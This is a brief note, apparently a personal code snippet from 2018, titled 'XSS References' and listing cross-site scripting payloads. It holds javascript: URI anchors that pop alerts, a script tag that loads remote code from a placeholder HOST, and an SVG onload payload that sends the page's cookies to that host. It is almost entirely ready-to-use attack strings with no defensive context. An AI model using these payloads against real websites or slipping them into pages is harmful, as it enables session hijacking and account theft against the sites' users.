themercee
4/4/2018 - 2:07 PM

XSS References

Refences and payload

In an attribute

<a src="javascript:alert('XSS');">click me</a>
<a src="javascript:alert(/XSS/);">click me</a>

<script src=//HOST/1.js></script>
<svg onload=fetch('//HOST/?cookie='+document.cookie)>